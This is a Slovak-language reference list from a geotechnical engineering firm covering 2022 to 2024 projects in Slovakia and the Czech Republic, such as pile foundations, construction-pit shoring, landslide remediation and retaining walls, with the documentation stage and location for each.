Projekty zakladania – Referencie

2024

 Popis stavby: Kaufland Slivenec

Popis práce: Pilótové zakladanie

Stupeň dokumentácie: DRS

Objekt: Požiarna nádrž, SO 01 Kaufland, retail, oporná stena

Miesto práce: Praha 5 – Barrandov

Popis stavby: Bory home 5

Popis práce: návrh pažiacej konštrukcie

Stupeň dokumentácie: DSP

Objekt: Zabezpečenie stavebnej jamy

Miesto práce: Bratislava, m.č. Lamač

Popis stavby: Polyfunkčný objekt „MOSKOWSKA“

Popis práce: zabezpečenie výkopov stavebnej jamy

Stupeň dokumentácie: DUR

Objekt:

Miesto práce: Bratislava – Staré mesto, Moskovská 11

Popis stavby: Bytový dom s polyfunkciou Mýtna 37

Popis práce:  zabezpečenie výkopov stavebnej jamy a hlbinného založenia

Stupeň dokumentácie: DUR

Objekt: Zabezpečenie stavebnej jamy a čerpanie

Založenie stavby (pilóty / mikropilóty)

Miesto práce: Bratislava, Mýtna 37

Popis stavby: Bytový dom Westend Business Park

Popis práce:  zabezpečenie výkopov, stavebnej jamy a hlbinného založenia

Stupeň dokumentácie: DUR

Objekt: Zabezpečenie stavebnej jamy a čerpanie

Založenie stavby (pilóty, prípadne mikropilóty)

Miesto práce: Bratislava

Popis stavby: Sanácia zosuvu v záhradkárskej oblasti

Popis práce: sanáciu zosuvu pomocou odvodnenia svahu drenážnymi rebrami

Stupeň dokumentácie: DRS

Objekt: svah

Miesto práce: Divina, okr. Žilina

Popis stavby: Vybudovanie záchytného bezpečnostného zariadenia a rekonštrukcia oporného múru, Divina

Popis práce: Oporné múry a záchytné bezpečnostné zariadenia na brehu potoka Divina

Stupeň dokumentácie: DRS

Objekt:

Miesto práce: Divina, okr. Žilina

Popis stavby: Mestská plaváreň v Dubnici nad Váhom

Popis práce: spôsob zabezpečenia stavebnej jamy pomocou štetovníc

Stupeň dokumentácie: DSP

Objekt: Mestská plaváreň

Miesto práce: Dubnica nad Váhom

Popis stavby: Výrobno – Skladové haly HFS Galanta

Popis práce:  hlbinné založenie na pilótach

Stupeň dokumentácie: DSP

Objekt: –

Miesto práce: Galanta

Popis stavby: Stanovisko – projekt a geotechnické návrhy

Popis práce: zrútenie skalných blokov

Stupeň dokumentácie: DRS

Objekt:

Miesto práce: Hričovské Podhradie

Popis stavby: Rekonštrukcia a rozšírenie ČOV Kolárovo

Popis práce: príprava staveniska, prekládky inžinierskych sietí, demontáž kolidujúcich konštrukcií

Stupeň dokumentácie: DRS

Objekt: Objekt SO-01, 02, 03, 04

Miesto práce: Kolárovo

Popis stavby: Sanácia zosuvu na ceste na Bankov – Košice

Popis práce: sanácia úseku cesty ,stabilizácia zosuvu

Stupeň dokumentácie: DSPRS

Objekt: D.3  Oporný múr

Miesto práce: Košice

Popis stavby: Novostavba – Oporný Múr, k.ú. Krásna Lúka, parc. č. 1592/50

Popis práce: monolitický ŽB oporný múr

Stupeň dokumentácie: DRS

Objekt: SO 01 – OPORNÝ MÚR          

Miesto práce: k.ú. Krásna Lúka, parc. č. 1592/50

Popis stavby: Novostavba – Oporný Múr, k.ú. Krásna Lúka, parc. č. 1592/50

Popis práce: stabilitné posúdenie navrhovaného oporného múru, okolitého územia po jeho vybudovaní

Stupeň dokumentácie: DRS

Objekt: SO 01 – OPORNÝ MÚR          

Miesto práce: k.ú. Krásna Lúka, parc. č. 1592/50

Popis stavby: Novostavba hospodárskej budovy Kysucké Nové Mesto ul. 1. Mája

Popis práce: hlbinnové založenie na mikropilótach a základových pásoch

Stupeň dokumentácie: DRS

Objekt: Zakladanie

Miesto práce: C-KN 818/1, 819/2, Kysucké Nové Mesto

Popis stavby: Sanácia zosuvu v obci Lednica

Popis práce: sanácia, stabilizácia zosuvného územia

Stupeň dokumentácie: DSPRS

Objekt: Oporný múr

Miesto práce: Lednica

Popis stavby: Bytový dom Klimentská

Popis práce: zabezpečenie výkopov a stavebnej jamy, podzemnými pažiacimi stenami

Stupeň dokumentácie: DRS

Objekt:

Miesto práce: Praha 1

Popis stavby: Obytný Súbor Prešov – Jarková Ul. III. Etapa

Popis práce: paženie stavebnej jamy

Stupeň dokumentácie: RD

Objekt: 

Miesto práce: Prešov

Popis stavby: Rekonštrukcia cesty I/64 Rajecká Lesná – Rajec

Popis práce: oporný múr založený na pilotách

Stupeň dokumentácie: DRS

Objekt: 221-00 Oporný múr na ceste I/64

Miesto práce: medzi obcou Rajecká Lesná a mestom Rajec

Popis stavby: Prístavba priemyselného závodu Kofola Rajecká lesná

Popis práce: založenie na mikropilótach

Stupeň dokumentácie: RD

Objekt: SO 01-01  skladová hala

Miesto práce: Rajecká Lesná

Popis stavby: Bytový dom Ružomberok- Bátorky

Popis práce: Zabezpečenie Stavebnej Jamy – paženie lokálnych úsekov

Stupeň dokumentácie: DRS

Objekt: stavebná jama

Miesto práce: Ružomberok

Popis stavby: I/18 ZA Strečno km 471,400 – 472,400 – IG prieskum nestabilného svahu

Popis práce: opatrenie počas prác

Stupeň dokumentácie: RD

Objekt:

Miesto práce: I/18 ZA – Strečno

Popis stavby: I/18 Strečno – Dubná skala Odstránenie havarijného stavu skalných stien

Popis práce: sanáciu havarijného stavu skalných stien

Stupeň dokumentácie: DSRS

Objekt: SO 10, km 6,585 – 6,925

Miesto práce: Strečno

Popis stavby: Rekreačná chata Trusalová – stabilizácia zosuvu

Popis práce: opatrenia na stabilizáciu svahu

Stupeň dokumentácie: DRS

Objekt: Drenážno-stabilizačné rebrá a mikropilóty

Miesto práce: C-KN 3343/17, 3339, 3343/2, Turany

Popis stavby: Prístavba výrobnej haly, Šteruská 3, 922 03 Vrbové, parc. č. 1008/1, 1008/2, 1063/13

Popis práce: Hlbinné založenie na pilótach

Stupeň dokumentácie: RD

Objekt: SO 01 Výrobná hala – Prístavba výrobnej haly

Miesto práce: Vrbové

Popis stavby: Prístavba výrobnej haly, Šteruská 3, 922 03 Vrbové

Popis práce: Hlbinné založenie na pilótach

Stupeň dokumentácie: PSP

Objekt: SO 01  Skladová hala

Miesto práce: Vrbové

Popis stavby: Rekonštrukcia oporného múru + bezp. zariadenie v k.ú. Vysoká nad Kysucou

Popis práce: Oporný múr

Stupeň dokumentácie: VTD

Objekt:

Miesto práce: Vysoká nad Kysucou

Popis stavby: Rekonštrukcia oporného múru + bezp. zariadenie v k.ú. Vysoká nad Kysucou

Popis práce: Oporný múr

Stupeň dokumentácie: DSP / DRS

Objekt:

Miesto práce: Vysoká nad Kysucou

Popis stavby: Sanácia zosuvu telesa cesty 4 x III/2240 v k.ú. Zázrivá – Havrania

Popis práce: Konštrukcie múrov

Stupeň dokumentácie:

Objekt: SO02 – Múry

Miesto práce: Zázrivá – Havrania

Popis stavby: Zosuv zemín a havária vodovodu Lednica

Popis práce: sanácia vybraného úseku

Stupeň dokumentácie: DRS

Objekt: SO 02 Múry

Miesto práce: Lednica

Popis stavby: Nemocnica AGEL Zvolen

Popis práce: zabezpečenie stavebnej jamy

Stupeň dokumentácie: DRS

Objekt: SO.02 prístavba k chirurgickému pavilónu

Miesto práce: Zvolen, p. č.1795/3,1795/10,1796,1795/5

Popis stavby:  Bytový dom Alojsa Jescha prístavba, nadstavba, a stavebné úpavy

Popis práce: Zabezpečenie stavebnej jamy

Stupeň dokumentácie: DSP

Objekt: SO 01   BYTOVÝ DOM

Miesto práce: súp. č. 1072, Námestie požiarnikov, Žilina

Popis stavby:  Multifunkčné centrum „Štadión“, Žilina

Popis práce: Rozširovanie komunikácie

Stupeň dokumentácie: DPSP

Objekt: SO 22.2 ROZŠÍRENIE KOMUNIKÁCIE –ULICA  ĽAVOBREŽNÁ

Miesto práce: Žilina

Popis stavby:  Multifunkčné centrum „Štadion“, Žilina Stavebná jama a preložky inžinierskych sieti – fáza 1

Popis práce: výkop stavebnej jamy

Stupeň dokumentácie: DPSP

Objekt: stavebná jama

Miesto práce: Žilina

Popis stavby: Multifunkčné centrum Štadión, Žilina 1. etapa

Popis práce: Výstavba rozvodnej a transformátorovej jednotky 5x1000kVA

Stupeň dokumentácie: DSP

Objekt: SO 11 Transformačná stanica

Miesto práce: Žilina

Popis stavby: OC Kaufland Bratislava – Dúbravka

Popis práce: Oporné múry

Stupeň dokumentácie:

Objekt: SO 211 Oporné múry

Miesto práce: Bratislava

2023

Popis stavby: Retail Box Banská Bystrica – Oporný múr OM1

Popis práce: Alternatíva pilótovej steny v stupni DRS; Retail Box Banská Bystrica

Miesto práce: Banská Bystrica

Popis stavby: CAPITAL SAFETY GROUP Banská Bystrica s.r.o. – Doplnenie nádrže a strojovne SHZ

Popis práce: Projektová dokumentácia špeciálne zakladanie

Stupeň dokumentácie: Dokumentácia realizácie stavby

Objekt: SO-07 NÁDRŽ SHZ

Miesto práce: Banská Bystrica

Popis stavby: Cesta III/3403 za hranicou KE/KS pred obcou Baška, sanácia zosuvu telesa cesty

Popis práce: geotechnický projekt sanácie zosuvu cesty III/3403

Stupeň dokumentácie: RPD

Objekt: Oporný múr cesty III/3403

Miesto práce: Baška

Popis stavby: Stabilizácia zosuvu nad rodinnými domami Nemček, Nemčeková

Popis práce: geotechnický projekt sanácie zosuvu cesty III/3403

Stupeň dokumentácie: jednostupňový projekt

Objekt: svah nad rodinným domom Bitarová, p.č. 425/34 a 425/51

Miesto práce: Bitarová

Popis stavby: Základná škola Pankúchova 4, rekonštrukcia plavárne

Popis práce: geotechnický návrh úpravy podložia v okolí bazéna

Stupeň dokumentácie: jednostupňový projekt

Objekt: úprava podlahy okolo bazéna

Miesto práce: Bratislava

Popis stavby: Zabezpečenie svahu na stavbe „Rodinné domy – Borinka“

Popis práce: stabilitné posúdenie

Stupeň dokumentácie: geotechnický posudok

Objekt: svah nad zástavbou rodinných domov

Miesto práce: Borinka

Popis stavby: PODZEMNÁ GARÁŽ – BLOKY P,R, Úprava podložia

Popis práce: geotechnický návrh riešenia úpravy podložia

Stupeň dokumentácie: dokumentácia skutočného vyhotovenia stavby

Objekt:E.201.1 SO 50.1.1

Miesto práce: Bratislava

Popis stavby: Polyfunkčný komplex ČEREŠNE 5

Popis práce: geotechnický návrh zakladania stavby

Stupeň dokumentácie: dokumentácia pre stavebné povolenie

Objekt:E.201.1 SO 50.1.1

Miesto práce: Bratislava

Popis stavby: PAŽENIE STAVEBNEJ JAMY

Popis práce: projekt paženia stavebnej stavby

Stupeň dokumentácie: dokumentácia realizácie stavby

Objekt: E.201.1

Miesto práce: Bratislava

Popis stavby: Garážový dom LOFTY Bratislava, Kominárska ul.

Popis práce: geotechnický prepočet

Stupeň dokumentácie: dokumentácia realizácie stavby

Objekt: otvorenie stavebnej jamy

Miesto práce: Bratislava

Popis stavby: POLYFUNKČNÝ KOMPLEX „NOVÝ TRH“

Popis práce: zabezpečenie stavebnej jamy

Stupeň dokumentácie: dokumentácia pre stavebné povolenie

Objekt:SO 02.1

Miesto práce: Bratislava

Popis stavby: POLYFUNKČNÝ BYTOVÝ DOM KRASŇANY

Popis práce: pilótové zakladanie

Stupeň dokumentácie: dokumentácia skutočného realizovania stavby

Objekt:

Miesto práce: Bratislava

Popis stavby: RODINNÝ DOM TAJOVSKÉHO

Popis práce: zabezpečenie stavebnej jamy

Stupeň dokumentácie: dokumentácia realizovania stavby

Objekt:

Miesto práce: Bratislava

Popis stavby: POLYFUNKČNÝ KOMPLEX ZÁTIŠIE

Popis práce: zabezpečenie stavebnej jamy

Stupeň dokumentácie: dokumentácia realizovania stavby

Objekt:SO 020

Miesto práce: Bratislava

Popis stavby:Ponávka Office Box A4

Popis práce: pilótové zakladanie

Stupeň dokumentácie: dokumentácia realizovania stavby

Objekt:  SO-01

Miesto práce: Brno

Popis stavby: Obchodní centrum DOMEČKY

Popis práce: pilótové zakladanie

Stupeň dokumentácie: dokumentácia realizovania stavby

Objekt:  –

Miesto práce: Bystřice pod Hostýnem

Popis stavby: ŽSR, Modernizácia koridoru, štátna hranica ČR/SR – Čadca – Krásno nad Kysucou (mimo), železničná trať, 3.etapa

Popis práce: zabezpečenia svahu pilótovou stenou

Stupeň dokumentácie: dokumentácia realizovania stavby

Objekt:  – SO 08-33-10

Miesto práce: Čadca

Popis stavby: ŽSR, Modernizácia koridoru, štátna hranica ČR/SR – Čadca – Krásno nad Kysucou (mimo), železničná trať, 3.etapa

Popis práce: zabezpečenia svahu pilótovou stenou zárubný múr pri koľ.č.1 (nžkm 283,040- 283,435)

Stupeň dokumentácie: dokumentácia realizovania stavby

Objekt:  SO 08-33-14

Miesto práce: Čadca

Popis stavby: ŽSR, Modernizácia koridoru, štátna hranica ČR/SR – Čadca – Krásno nad Kysucou (mimo), železničná trať, 3.etapa

Popis práce: Geotechnický posudok únosnosti podložia podpernej skruže

Stupeň dokumentácie: posudok

Objekt: SO 203-00 Most na D1 v km 1,601 – 1,739 – Ľavý most

Miesto práce: Hubová – Ivachnová

Popis stavby: Rozšírenie odvalového hospodárstva Eurotalc s.r.o., Gemerská Poloma

Popis práce: Geotechnické posúdenie a projektová dokumentácie rozšírenia odvalového hospodárstva

Stupeň dokumentácie: DRS

Objekt: depónia odvalu

Miesto práce: Gemerská Poloma

Popis stavby: Sanácia zosuvu OC Handlová

Popis práce: Stabilizačné opatrenia

Stupeň dokumentácie: DRS

Objekt: svah nad OC

Miesto práce: Handlová

Popis stavby: Sanácia zosuvu OC Handlová

Popis práce: Geotechnické zhodnotenie aktuálneho stavu a návrh ďalších protihavarijných opatrení „OC Handlová – zosuv“

Stupeň dokumentácie: posudok

Objekt: svah nad OC

Miesto práce: Handlová

Popis stavby: Vypracovanie dokumentácie pre SP v rozsahu RP, vrátane výkazu

Popis práce: Geotechnické zhodnotenie aktuálneho stavu a návrh ďalších protihavarijných opatrení „OC Handlová – zosuv“

Stupeň dokumentácie: DSP

Objekt: Zarovnanie koruny telesa hrádze odkaliska

Miesto práce: Hencovce

Popis stavby: Vypracovanie dokumentácie pre DSPRS

Popis práce: Geotechnické zhodnotenie aktuálneho stavu a návrh kotvenia existujúceho zárubného múru

Stupeň dokumentácie: DSPRS

Objekt: Zárubný múr

Miesto práce: Hronec

Popis stavby: Vypracovanie dokumentácie pre DSPRS

Popis práce: hĺbkové zakladanie

Stupeň dokumentácie: DRS

Objekt: SO02 – Hala B, SO03 – Hala C

Miesto práce: Humpolec

Popis stavby: Rekonštrukcia oporného múru na ceste II/519
v k. ú. Jasenovo – sanácia vtoku priepustu

Popis práce: projekt zameraný na :
– Výmenu časti spodnej stavby
– Výmenu časti nosnej konštrukcie
– Zhotovenie novej rímsy a osadenie nového bezpečnostného zariadenia

Stupeň dokumentácie: DSPRS

Objekt: Kamenný oporný múr dĺžky cca 40,0m (obr.1) na ceste II/519 v extraviláne obce Jasenovo v staničení CDB ckm 9,148 – 9,191 kum
vľavo.

Miesto práce: Jasenovo

Popis stavby:VÝROBNÁ HALA METAL FORMING SOLUTION (MFS)

Popis práce: zabezpečenie stavebnej jamy

Stupeň dokumentácie: DRS

Objekt: stavebná jama

Miesto práce: Kechnec- Košice okolie

Popis stavby: BYTOVÝ DOM MOYZESOVA PRÍSTAVBA – Košice, Moyzesova 16

Popis práce: zabezpečenie stavebnej jamy

Stupeň dokumentácie: DRS

Objekt: stavebná jama

Miesto práce: Košice, Moyzesova 16

Popis stavby: OBCHODNÉ CENTRUM KOŠICE

Popis práce: návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery

Stupeň dokumentácie: DRS

Objekt: So 01

Miesto práce: Košice

Popis stavby: HALA OTRYSKÁVANIA – PRÍSTAVBA

Popis práce: zabezpečenie stavebnej jamy

Stupeň dokumentácie: DRS

Objekt: So 01

Miesto práce: Michalovce

Popis stavby: OPTIMA obchodné centrum

Popis práce: Založenie vstavku v OC na mikropilótach – verzia oceľ a betón + posúdenie existujúcich základov na priťaženie vstavkom

Stupeň dokumentácie: Prepočet špeciálneho zakladania

Objekt: So 01

Miesto práce: Košice

Popis stavby:Haleon – rozšírenie výrobno-skladovej haly – Levice

Popis práce: Znávrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby
do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň
jednotlivých častí objektu a zároveň geologické pomery

Stupeň dokumentácie: DRS

Objekt: So 01

Miesto práce: Levice

Popis stavby: ELTEK s.r.o. – IV. etapa- Prístavba skladu TPS

Popis práce: návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby
do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň
jednotlivých častí objektu a zároveň geologické pomery

Stupeň dokumentácie: DRS

Objekt: So 01

Miesto práce: Liptovský Hrádok

Popis stavby:

CORVUS ÁTRIUM SO 101 – MALACKY

Popis práce: návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby
do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň
jednotlivých častí objektu a zároveň geologické pomery

Stupeň dokumentácie: DRS

Objekt: So 01

Miesto práce: Liptovský Hrádok

Popis stavby: Obnova verejného priestranstva prostredníctvom vybudovania zelenej infraštruktúry v centre Malaciek

Popis práce: návrh hlbinného založenia na mikropilótach

Stupeň dokumentácie: DRS

Objekt: SO 3 MOBILIAR – SOCHA SEVERÍNA

Miesto práce: Malacky

Popis stavby: HALA OTRYSKÁVANIA – PRÍSTAVBA  – Michalovce

Popis práce: zabezpečenie stavebnej jamy

Stupeň dokumentácie: DRS

Objekt: SO 1 -hala

Miesto práce: Michalovce, ul. Stavbárov 5845

Popis stavby: Polyfunkčný objekt  – Modra, č. p. 257, Štúrova ulica

Popis práce: projekt zabezpečenia stavebnej jamy

Stupeň dokumentácie: DRS

Objekt: 

Miesto práce: Modra, č. p. 257, Štúrova ulica

Popis stavby: ODDYCHOVÁ ZÓNA PRI CYKLOTRASE

Popis práce: projekt zakladania stavby

Stupeň dokumentácie: DRS

Objekt: SO 02 LEZECKÁ STENA

Miesto práce: Nová Bystrica , KN 9998/1

Popis stavby: REKONŠTRUKCIA VYBRANÉHO ÚSEKU CESTY II/520 V ČASTI NOVÁ BYSTRICA km 20,526 – km 22,000

Popis práce: projekt zakladania oporných múrov

Stupeň dokumentácie: DSRS

Objekt: OM1 až OM 7

Miesto práce: Nová Bystrica

Popis stavby: NÁJOMNÝ BYTOVÝ DOM, PARCELA 3825/220

Popis práce: návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby
do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň
jednotlivých častí objektu a zároveň geologické pomery

Stupeň dokumentácie: DRS

Objekt: SO 01

Miesto práce: Považská Bystrica

Popis stavby:PRŮMYSLOVÉ HALY IPR ROUSÍNOV

Popis práce: návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby
do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň
jednotlivých častí objektu a zároveň geologické pomery

Stupeň dokumentácie: DRS

Objekt: SO 04 – hala D

Miesto práce: Rousínov, ČR

Popis stavby: Environmentálne centrum v meste Šamorín – školiace stredisko

Popis práce: paženie stavebnej jamy pilótovou stenou s torkrétom pre stavbu:

„POLYFUNKČNÝ OBJEKT MOLAR, Bratislavská cesta, Šamorín

Stupeň dokumentácie: DRS

Objekt:

Miesto práce: Šamorín

Popis stavby: HELIOS ŠTRBSKÉ PLESO, VYSOKÉ TATRY, REKONŠTRUKCIA  A DOSTAVBA                                                 

Popis práce: návrh zabezpečenia stavebnej jamy, ktoré spočíva v návrhu záporovej pažiacej steny, kotvenej pomocou tyčových zemných kotiev

Stupeň dokumentácie: zmena stavby pred dokončením (ZSPD)

Objekt: SO 01

Miesto práce: Vysoké Tatry

Popis stavby: Sanácia zosuvu vozovky v km 26,71-26,95 a prestavba mosta 583-020

Popis práce: Táto dokumentácia rieši výlučne mikropilóty navrhnuté v projektovej dokumentácii v stupni DSP/DRS, pričom upravuje výlučne vystuženie a priemer navrhovaných mikropilót. Počet, dĺžka a pôdorysné usporiadanie mikropilót sa nemení

Stupeň dokumentácie: DRS

Objekt: SO 01

Miesto práce: Terchová

Popis stavby: ŽSR, TERMINÁL INTEGROVANEJ OSOBNEJ PREPRAVY TREBIŠOV

Popis práce: Táto dokumentácia rieši záporové paženie výkopu pre realizáciu podchodu pre cestujúcich a chodcov

Stupeň dokumentácie: DRS

Objekt:

Miesto práce: Trebišov

Popis stavby: ŽSR, TERMINÁL INTEGROVANEJ OSOBNEJ PREPRAVY TREBIŠOV – česky

Popis práce: návrh hlubinného založení na pilotách tak, aby bylo bezpečně přeneseno zatížení z horní stavby do podloží. Cílem projektu bylo navrhnout rozmístění pilot a základových hlavic pod nosnými částmi objektu tak, aby zohledňovaly výškovou úroveň jednotlivých částí objektu a zároveň geologické poměry

Stupeň dokumentácie: tendrová dokumentácia

Objekt:

Miesto práce: Úpice, ČR

Popis stavby: Sanácia zosuvu telesa cesty 4 x III/2240 v k.ú. Zázrivá – Havrania

Popis práce: Konštrukcie múrov zabezpečia stabilitu svahu v rámci riešených úsekov sanácie zosuvu telesa cesty III/2240 v k.ú. Zázrivá. Komunikácia v jednotlivých úsekoch vykazuje poruchy obrusnej a ložnej vrstvy vozovky, resp. je porušená celá vozovka vplyvom deformácií a zosuvov

Stupeň dokumentácie: DVP – výrobno prevádzková dokumentácia

Objekt: SO 02 – múry

Miesto práce: Zázrivá – Havrania

Popis stavby: Oporná konštrukcia vo svahu nad objektom Reštaurácie Jánošíkov dvor

Popis práce: návrh sanácie svahu  pomocou opornej konštrukcie

Stupeň dokumentácie: DRS

Objekt: SO 02 – múry

Miesto práce: Zázrivá – Havrania

Popis stavby: Sanácia porušeného oporného múra

Popis práce: Sanácia územia je navrhnutá povrchovým odvodnením cestnej komunikácie vedeným nad riešeným pozemkom a kotvením existujúceho oporného múru, čo zabezpečí stabilitu zosúvajúceho sa svahu

Stupeň dokumentácie: jednostupňový projekt

Objekt: 

Miesto práce: Zázrivá – Grúne

Popis stavby:Areál firmy Elektro-Haramia so showroomom

Popis práce: návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia. Cieľom projektu bolo navrhnúť rozmiestnenie pilót pod nosnými časťami objektu tak, aby zohľadňovali výškovú úroveň jednotlivých častí objektu a zároveň geologické pomery

Stupeň dokumentácie: DSP

Objekt: 

Miesto práce: Zohor, okr. Malacky

Popis stavby: RODINNÝ DOM S TROMI BYTMI NA PARC. Č. 1472/182

Popis práce: návrh zabezpečenia stavebnej jamy, ktoré spočíva v návrhu pilótovej a záporovej pažiacej steny, kotvenej pomocou lanových a tyčových zemných kotiev (v niektorých úsekoch).

Stupeň dokumentácie: DRS

Objekt: 

Miesto práce: Žilina

Popis stavby:UNIVERZITNÉ MESTEČKO VEĽKÝ DIEL, ŽILINA – II. ETAPA

Popis práce: návrh hlbinného založenia na pilótach tak, aby bolo bezpečne prenesené zaťaženie z hornej stavby do podložia, za splnenia požadovaného sadania., na vytvorenej pilótovacej úrovni

Stupeň dokumentácie: DRS

Objekt: SEKCIA J – BYTOVÝ DOM

Miesto práce: Žilina

Popis stavby: PILÓTOVÉ ZÁKLADY,  Rev.01 – ZMENA TECHNOLÓGIE ZAKLADANIA

Popis práce: návrh hlbinného založenia na pilótach

Stupeň dokumentácie: DRS

Objekt: SO 53-33-10 – REKONŠTRUKCIA ŽELEZNIČNÉHO MOSTA PONAD ULICU KYSUCKÁ, sžkm 337,694

Miesto práce: Žilina

2022

Popis stavby:Ružomberok – Hríby, Bytový dom s polyfunkciou

Popis práce: Projektová Dokumentácia pre stavebné povolenie

Miesto práce: Ružomberok

Popis stavby: Polyfunkčný súbor EUROVEA 2

Popis práce: STAVBA č.08 – VEREJNÉ PRIESTORY – I. etapa, SO 809 VYHLIADKOVÁ LÁVKA – stupeň RP, Rev_01

Miesto práce: Bratislava

Popis stavby: Projekt zabezpečenia stavebnej jamy

Popis práce: Dokumentácia pre stavebné povolenie (DSP) – zabezpečenie stavebnej jamy

Miesto práce: Bratislava

Popis stavby: Projekt paženia stavebnej jamy

Popis práce: Dokumentácia pre stavebné povolenie (DSP) – zabezpečenie stavebnej jamy

Miesto práce: Bratislava

Popis stavby: Zabezpečenie stavebnej jamy a čerpania vody

Popis práce: Projektová dokumentácia, pilótové založenie stavby Triangel 2,

Zabezpečenie stavebnej jamy a čerpania vody – stupeň DSP

Miesto práce: Bratislava

Popis stavby:   „Stabilizácia podložia pod cestu v lokalite IBV Čierne“

Popis práce:  „Stabilizácia podložia pod cestu s nákladnou dopravou v lokalite IBV Čierne“  Stupeň: DSP/DRS

Miesto práce: Čierne

Popis stavby: Diaľnica D1 Hubová – Ivachnová

Popis práce: Geotechnický posudok únosnosti podložia a skladby panelov podpernej skruže,  SO 203-00 Most na D1 v km 1,601 – 1,739

Miesto práce: Hubová – Ivachnová

Popis stavby: Sanácia oporného múra a odvodnenie na ceste III/3420 v obci Kluknava

Popis práce:  Dokumentácia pre stavebné povolenie v podrobnostiach dokumentácie na realizáciu stavby

Miesto práce: Kluknava

Popis stavby: Rekonštrukcia a rozšírenie ČOV Kolárovo

Popis práce: dokumentácia pre realizáciu stavby (DRS),  objekt SO-01, 02, 03, 04

Miesto práce: Kolárovo

Popis stavby: Rekreačno – športový areál CASTORIA 1.lokalita AVAL

Popis práce: OPORNÁ STENA NAD SO-24

Miesto práce: Bobrovník

Popis stavby: Projekt zabezpečenia stavebnej jamy

Popis práce: DSRS – dokumentácia skutočného realizovania stavby

Miesto práce: Bratislava

Popis stavby: Zabezpečenie stavebnej jamy

Popis práce:  Dokumentácia pre územné rozhodnutie

Miesto práce: Bratislava

Popis stavby: Špeciálne zakladanie

Popis práce:  Dokumentácia pre stavebné povolenie

Miesto práce: Bratislava

Popis stavby: Obytný súbor Fazuľová Residencia 2

Popis práce:  Stabilizácia a paženie stavebnej jamy

Miesto práce: Bratislava

Popis stavby: Budova internátu SOŠ Svätoplukova ul.

Popis práce: Posúdenie sadnutia južného krajného poľa budovy internátu pri realizácií zabezpečenia stavebnej jamy ZWIRN 3 – administratívna budova BCT3 pomocou tryskovej injektáže

Miesto práce: Bratislava

Popis stavby: Bytový dom, Sekurisova ul.

Popis práce:

Geotechnika – DUR – dokumentácia pre územné rozhodnutie

Miesto práce: Brezno

Popis stavby: Bytový dom ul. MPČL. Brezno – Mazorníkovo

Popis práce: SO-02 Bytový dem, dil. Celok 1, 2, Realizačný projekt

Miesto práce: Brezno

Popis stavby: Čierne IBV, Stabilizácia podložia

Popis práce: Stabilizácia podložia pod cestou s nákladnou dopravou v lokalite IBV Čierne, Dokumentácia pre stavebné povolenie, dokumentácia realizácie stavby

Miesto práce: Čierne

Popis stavby: Diaľnica D1 Hubová – Ivachnová

Popis práce: Geotechnický posudok únosnosti podložia a skladby panelov podpernej skruže

Diaľnica D1 Hubová – Ivachnová, SO 203-00 Most na D1 v km 1,601 – 1,739

Miesto práce:Diaľnica D1 Hubová – Ivachnová

Popis stavby: Diaľnica D1 Hubová – Ivachnová

Popis práce: Geotechnický posudok únosnosti podložia a skladby panelov podpernej skruže

Diaľnica D1 Hubová – Ivachnová, SO 203-00 Most na D1 v km 1,601 – 1,739

Miesto práce:Diaľnica D1 Hubová – Ivachnová

Popis stavby: Skladová hala H2 – areál PRESSKAM

Popis práce: SO-01 Skladová hala H2 – zakladanie , projekt realizácie stavby

Miesto práce: Devínska Nová Ves

Popis stavby: Bytový dom

Popis práce: zabezpečenie stavebnej jamy, dokumentácia pre stavebné povolenie

Miesto práce: Dolný Kubín

Popis stavby: Mestská plaváreň

Popis práce: Zabezpečenia stavebnej jamy pre projekt Mestská plaváreň Dubnica  – projekt pre stavebné povolenie

Miesto práce:Dubnica nad Váhom

Popis stavby:Rozšírenie odvalového hospodárstva Eurotalc s.r.o., Gemerská Poloma

Popis práce: Zmena dokončenej stavby

Miesto práce: Gemerská Poloma

Popis stavby: Hnilec sanácia zosuvu na ceste II/533

Popis práce: SO01 Sanácia cesty 0,000 – 0,200 km,  SO02 Sanácia cesty 0,200 – 0,400 km, SO03 Sanácia cesty 0,400 – 0,609 27 km
Dokumentácia pre stavebné povolenie v podrobnostiach dokumentácie pre realizáciu stavby (DSPRS)

Miesto práce: Hnilec

Popis stavby: CYKLOTRASA HOLÍČ – SKALICA, 1. ETAPA

Popis práce:  SO 02.1 – LÁVKA Č.1 – LÁVKA PRE CYKLISTOV CEZ RIEKU CHVOJNICA
STATICKÝ VÝPOČET MIKROPILÓTOVÝCH ZÁKLADOV (POSÚDENIE MIKROPILÓTOVÝCH ZÁKLADOV)

Miesto práce: Holíč – Skalica

Popis stavby: Bytový dům J1-J2 Chrudim

Popis práce: Dokumentácia špeciálneho zakladania v stupni: DRS, autorský dozor a DSVS

Miesto práce: Chrudim

Popis stavby: Rezidence Chrudimpark bytový dum V1

Popis práce: Dokumentácia špeciálneho zakladania v stupni: Skutočné vyhotovenie stavby

Miesto práce: Chrudim

Popis stavby:Sanácia oporného múra a odvodnenie na ceste III/3420 v obci Kluknava

Popis práce: Dokumentácia pre stavebné povolenie v podrobnostiach dokumentácie na realizáciu stavby

Miesto práce:Kluknava

Popis stavby: Prekladané stožiare č. 8 a č. 9 – realizačná projektová dokumentácia – vypracovanie návrhu mikropilótových základov – výkaz výmer

